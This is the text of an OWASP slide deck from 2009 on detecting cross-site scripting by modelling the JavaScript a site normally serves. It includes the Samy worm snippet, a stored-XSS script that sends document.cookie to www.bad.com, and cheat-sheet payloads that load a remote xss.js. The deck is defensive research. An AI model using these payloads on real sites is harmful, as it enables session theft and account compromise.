Copyright © The OWASP FoundationPermission is granted to copy, distribute and/or modify this document under the terms of the OWASP License.

The OWASP Foundation

OWASP

http://www.owasp.org

A new approach to XSS Detection using JavaScript Modeling

Ofer Rotbergrotbergofer@gmail.comDavid Movshovitzdmovshovitz@gmail.comIDC

September 2009

OWASP 2

Agenda

Background and Motivation

Current Solutions…and drawbacks

Our Approach

Evaluation and Results

Conclusion & Further Work

OWASP 4

Web Application Vulnerabilities

Source:IBM Internet Security Systems X-Force® 2008 Trend & Risk Report

OWASP 5

Closer Look

Source: “WhiteHat Website Security Statistic Reports”, Dec 2008

OWASP 6

Attackers Prefer the Application Layer

The application layer is the weakest link – no generic defense mechanism.

The application layer leads the attacker directly to the data.

A plethora of freely available web applications.

Very simple to perform.Every input has the potential to be an

attack vector.In order to (really) fix must change code

(On average, 60 days to repair XSS vulnerability).

OWASP 7

MySpace.com virus (a.k.a Samy worm)

Date: October 5, 2005. Target: force users to become my friends. Samy inserted raw HTML into his profile.

<div id="mycode" expr="alert('hah!')" style="background:url('java script:eval(document.all.mycode.expr)')">

The payload adds Samy to visitor’s friends and copy itself to visitor’s profile.

MySpace was forced to shutdown its website, fix the vulnerability, and perform clean up.

Source: XSS WORMS AND VIRUSES The Impending Threat and the Best Defense, APRIL 2006 , Jeremiah Grossman.

OWASP 8

XSS in Details Three known types:

Reflected (Non-Persistent) Stored (Persistent) DOM Based (Local)

The target is to run hostile JavaScript on the victims browser.

JavaScript malware can: Steal Cookie Map internal networks Spread like a worm …

OWASP 9

Reflected XSS

Request http://www.website.com/

index.php?name=Jim

Response<html>

<body>Hello, Jim...

Request http://www.website.com/

index.php?name=Jim<script>alert("XSS")</script>

Response<html>

<body>Hello, Jim<script>alert("XSS")</

script>...Browser – assumes server doesn’t send malicious

content Parse HTML – build DOM Fetch resources and execute them.

Browser – assumes server doesn’t send malicious content

Parse HTML – build DOM Fetch resources and execute them.

OWASP 10

Stored XSS

OWASP 11

Stored XSS

Trudy posts the following text on a message board:Great message! <script>

var img=new Image();img.src=

"http://www.bad.com/CookieStealer/Form1.aspx?s= "+document.cookie;

</script>

When Bob views the posted message, his browser executes the malicious script, and his session cookie is sent to Trudy

OWASP 12

DOM-Based XSS

First published by Amit Klein (http://www.webappsec.org/projects/articles/071105.shtml)

http://victim/promo?product_id=100&title=Last+Chancehttp://victim/promo?

product_id=100&title=Foo#<SCRIPT>alert('XSS') </SCRIPT>

<script>var url =

window.location.href;var pos =

url.indexOf("title=") + 6;var len = url.length;var title_string =

url.substring(pos,len);

document.write(title_string);</script>

pos len

Last Chance !xss

OWASP 1313

Current Solutions

XSS is a sub-problem of Insufficient Input Validation.

Server-Side Application Static/Dynamic code analysis (white box) Web application scanners (black box)

Server-Side Proxy Input validation Escaping\Output encoding (‘<‘ &lt) HTTP-request anomaly detection

Client-Side Disable JS. Noxes - a web proxy that fetches HTTP requests and

can either block or allow based on current security policy.

OWASP 14

Problems with current solutions

Escaping - Good practice ! But, Many web-application permit and return HTML

tags (<b>, <ul>…)What about URI scheme like javascript:

Blacklisting (negative logic) is difficult <SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT> <IMG SRC="javascript:alert('XSS');"> <BODY ONLOAD=alert('XSS')> …and 100+ more attack vectors in RSnake’s XSS Cheatsheet. An effective filter must also ensure that is does not introduces

new scripts Before: <img src=". . . " target="onload="malicious script"> After: <img src=". . . " onload="malicious script">

14

OWASP 15

Problems with current solutions (cont.)

Focusing only on HTTP-request is problematic Even if an attack was detected, it doesn’t mean it will

actually occur (false positive). What about Stored XSS attacks ?

Client-side solutions Deployment Browser modifications/integration.

15

OWASP 1616

Problems with current solutions (cont.)

GET http://bank.com/main.php?uName=JackMain()

• echo (“<SCRIPT>”)• echo (“Document.write(

“Hello” + $uName);”)• echo (“</SCRIPT>

Hello Jack

<script>

Document.write(“Hello” + “Jack”);

</script>

OWASP 1717

Problems with current solutions (cont.)

GET http://bank.com/main.php?uName=Jack”);alert(‘xss!’)

Main()• echo (“<SCRIPT>”)• echo (“Document.write(

“Hello” + $uName);”)• echo (“</SCRIPT>

Hello Jack

<script>

Document.write(“Hello” + “Jack”);

alert(‘xss’);

</script>

xss!

OWASP 1818

Our Approach

Positive security logicAnything is illegal unless known to be legal

Focus on HTTP responseModel – code-script elements in HTML web-

pagesAssumption: the set of all instances of code-

script elements is bounded and can be learned in a relative short period.

1st try – JavaScript code is static.2nd try – JavaScript code is static under some

transformation.

OWASP 1919

Detector Architecture

OWASP 2020

XSS Attack Detection

Learning modeFor each extracted JS:

Learn regular form. Learn canonicalized

form.

Three concerns Coverage Updating

– Deploy detector in testing environment.

– Perform deeper inspection.

Learning data-set should be with no malicious JS

Detection modeFor each unknown

JS do: Further inspection. Strip out Inform web-admin

OWASP 2121

Deployment options

Web proxyProtect a single web-application

Integration with the browser JS extraction is done by browser.Defend against DOM-based XSS. Improved performance.

Web Application

Web Proxy

Client

OWASP 2222

Evaluation Methodology

FP Choose top-ranked 40 web-application. Crawl each web application Learn each web-page & build code-elements DB Perform 2 tests:

Convergence test: #pages to needed to learn all JS. FP test: FP = (#pages causing alarm)/(#pages).

FN Test detector against RSnake’s cheat-sheet. Choose vulnerable application from xssed.com Generate benign-input and attack-input. Learn with benign. Detect with attack. Each result was also checked

manually.

OWASP 2323

Results

Zero FP

FN – all attacks were detected. Convergence Test

0

0.1

0.2

0.3

0.4

0.5

0.6

0.7

0.8

0.9

1

0 5 10 15 20 25 30 35 40 45

Number of pag es to learn till c onverg nenc e

CD

F

OWASP 2424

Conclusion

Zero FP under canonicalizationGeneric - targets all types of XSS

Even DOM-Based could be mitigated if web proxy is deployed on client side.

Fast convergence – short learning periodNumber of canonicalized JS nodes is bounded.Most JS nodes appear in every page (“building

blocks”).

Copyright © The OWASP FoundationPermission is granted to copy, distribute and/or modify this document under the terms of the OWASP License.

The OWASP Foundation

OWASP

http://www.owasp.org

Thanx !

Ofer RotbergIDCrotbergofer@gmail.com

September 2009